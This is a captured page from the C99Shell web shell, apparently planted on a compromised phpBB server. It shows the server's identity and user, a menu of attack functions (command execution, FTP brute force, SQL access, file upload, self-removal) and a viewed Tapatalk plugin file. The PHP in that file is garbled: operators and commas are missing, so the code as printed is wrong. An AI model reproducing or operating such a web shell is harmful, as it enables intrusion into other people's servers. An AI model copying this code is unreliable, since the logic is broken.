!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/mobiquo/function/   drwxrwxr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     search_topic.php (1.37 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* @copyright (c) 2009 Quoord Systems Limited
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
defined('IN_MOBIQUO') or exit;

function 
search_topic_func($xmlrpc_params)
{
    global 
$config;
    
$params php_xmlrpc_decode($xmlrpc_params);

    
$keywords $params[0];

    
$start_num  0;
    
$end_num    19;
    if (isset(
$params[1]) && is_int($params[1]))
    {
        
$start_num $params[1];
    }

    
// get end index of topic from parameters
    
if (isset($params[2]) && is_int($params[2]))
    {
        
$end_num $params[2];
    }

    
// check if topic index is out of range
    
if ($start_num $end_num)
    {
        return 
get_error(5);
    }

    
// return at most 50 topics
    
if ($end_num $start_num >= 50)
    {
        
$end_num $start_num 49;
    }
    
$config['topics_per_page'] = $end_num $start_num 1;
    
    
$_GET['keywords'] = $keywords;
    
$_GET['terms'] = 'all';
    
$_GET['author'] = '';
    
$_GET['sc'] = 1;
    
$_GET['sf'] = 'all';
    
$_GET['sr'] = 'topics';
    
$_GET['sk'] = 't';
    
$_GET['sd'] = 'd';
    
$_GET['st'] = $start_num;
    
$_GET['ch'] = 300;
    
$_GET['t'] = 0;
    
$_GET['submit'] = 'Search';
    
    
$_REQUEST array_unique(array_merge($_GET$_REQUEST));
    
    include(
'./function/search.php');
    return 
search_func();

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0029 ]--